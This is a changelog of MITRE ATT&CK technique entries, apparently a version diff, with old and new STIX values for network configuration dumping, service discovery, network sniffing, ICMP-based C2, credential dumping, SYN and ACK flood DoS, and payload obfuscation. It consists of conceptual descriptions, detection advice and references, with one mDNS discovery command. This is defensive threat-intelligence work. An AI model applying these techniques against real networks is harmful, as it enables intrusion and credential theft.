| Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use. Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. | Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.<br>Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-22 01:45:55.144000+00:00 | 2022-02-17 19:50:46.948000+00:00 |
| description | Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use. Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. | Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.<br>Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. |
| x_mitre_detection | Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018) | Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration.(Citation: US-CERT TA18-068A 2018) |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well. | Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)<br>Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.<br>Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Apple Inc. (2013, April 23). Bonjour Overview. Retrieved October 11, 2021. | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'User'] | |
| external_references | CAPEC-300 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-09 14:56:26.562000+00:00 | 2022-04-20 16:05:30.960000+00:00 |
| name | Network Service Scanning | Network Service Discovery |
| description | Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well. | Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)<br>Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.<br>Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley) |
| external_references[1]['source_name'] | capec | apple doco bonjour description |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/300.html | https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html |
| x_mitre_version | 2.2 | 3.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'CISA AR21-126A FIVEHANDS May 2021', 'description': 'CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.', 'url': 'https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a'} | |
| external_references | {'source_name': 'macOS APT Activity Bradley', 'description': 'Jaron Bradley. (2021, November 14). What does APT Activity Look Like on macOS?. Retrieved January 19, 2022.', 'url': 'https://themittenmac.com/what-does-apt-activity-look-like-on-macos/'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/300.html', 'external_id': 'CAPEC-300'} | |
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_platforms | Network | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution | |
| Old Description | New Description |
|---|---|
| Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. | Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.<br>Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring) (Citation: GCP Packet Mirroring) (Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic. (Citation: Rhino Security Labs AWS VPC Traffic Mirroring) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Oleg Kolesnikov, Securonix', 'Tiago Faria, 3CORESec'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022. | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
| external_references | CAPEC-158 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-02 17:51:59.236000+00:00 | 2022-05-20 17:32:27.146000+00:00 |
| description | Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. | Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.<br>Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring) (Citation: GCP Packet Mirroring) (Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic. (Citation: Rhino Security Labs AWS VPC Traffic Mirroring) |
| external_references[1]['source_name'] | capec | AWS Traffic Mirroring |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/158.html | https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_detection | Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes. | Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes. In cloud-based environments, monitor for the creation of new traffic mirrors or modification of existing traffic mirrors. |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'GCP Packet Mirroring', 'description': 'Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.', 'url': 'https://cloud.google.com/vpc/docs/packet-mirroring'} | |
| external_references | {'source_name': 'SpecterOps AWS Traffic Mirroring', 'description': 'Luke Paine. (2020, March 11). Through the Looking Glass — Part 1. Retrieved March 17, 2022.', 'url': 'https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512'} | |
| external_references | {'source_name': 'Azure Virtual Network TAP', 'description': 'Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.', 'url': 'https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview'} | |
| external_references | {'source_name': 'Rhino Security Labs AWS VPC Traffic Mirroring', 'description': 'Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/158.html', 'external_id': 'CAPEC-158'} | |
| x_mitre_platforms | IaaS | |
| Old Description | New Description |
|---|---|
| Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. | Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 19:41:49.412000+00:00 | 2022-02-17 15:38:54.578000+00:00 |
| description | Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. | Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. |
| x_mitre_data_sources[0] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow |
| Description |
|---|
| Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information. Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 19:55:01.922000+00:00 | 2022-03-08 21:00:53.436000+00:00 |
| x_mitre_data_sources[0] | Process: Process Creation | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[1] | Process: Process Access | Windows Registry: Windows Registry Key Access |
| x_mitre_data_sources[2] | Command: Command Execution | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[3] | File: File Access | Process: Process Access |
| x_mitre_data_sources[4] | Windows Registry: Windows Registry Key Access | Command: Command Execution |
| x_mitre_data_sources[5] | Active Directory: Active Directory Object Access | Process: OS API Execution |
| x_mitre_data_sources[6] | Network Traffic: Network Traffic Flow | Active Directory: Active Directory Object Access |
| x_mitre_data_sources[7] | Network Traffic: Network Traffic Content | Process: Process Creation |
| x_mitre_data_sources[8] | Process: OS API Execution | File: File Access |
| Old Description | New Description |
|---|---|
| Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood) ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood) | Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity.<br>These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood) ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. | |
| external_references | Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019. | |
| external_references | CAPEC-469 | |
| external_references | CAPEC-482 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-469 | |
| external_references | CAPEC-482 | |
| external_references | Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019. | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-16 15:54:35.429000+00:00 | 2022-04-19 23:12:31.329000+00:00 |
| description | Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood) ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood) | Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity.<br>These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood) ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood) |
| external_references[1]['source_name'] | capec | Cisco DoSdetectNetflow |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/469.html | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf |
| external_references[2]['source_name'] | capec | Cloudflare SynFlood |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/482.html | https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/ |
| external_references[3]['source_name'] | Arbor AnnualDoSreport Jan 2018 | Corero SYN-ACKflood |
| external_references[3]['description'] | Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019. | Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019. |
| external_references[3]['url'] | https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf | https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html |
| external_references[4]['source_name'] | Cloudflare SynFlood | Arbor AnnualDoSreport Jan 2018 |
| external_references[4]['description'] | Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019. | Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019. |
| external_references[4]['url'] | https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/ | https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf |
| external_references[5]['source_name'] | Corero SYN-ACKflood | capec |
| external_references[5]['url'] | https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html | https://capec.mitre.org/data/definitions/469.html |
| external_references[6]['source_name'] | Cisco DoSdetectNetflow | capec |
| external_references[6]['url'] | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf | https://capec.mitre.org/data/definitions/482.html |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Sensor Health: Host Status | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Sensor Health: Host Status | |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.<br>This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017. | |
| external_references | CAPEC-267 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-267 | |
| external_references | Carr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018. | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20 16:33:13.472000+00:00 | 2022-09-30 18:06:32.808000+00:00 |
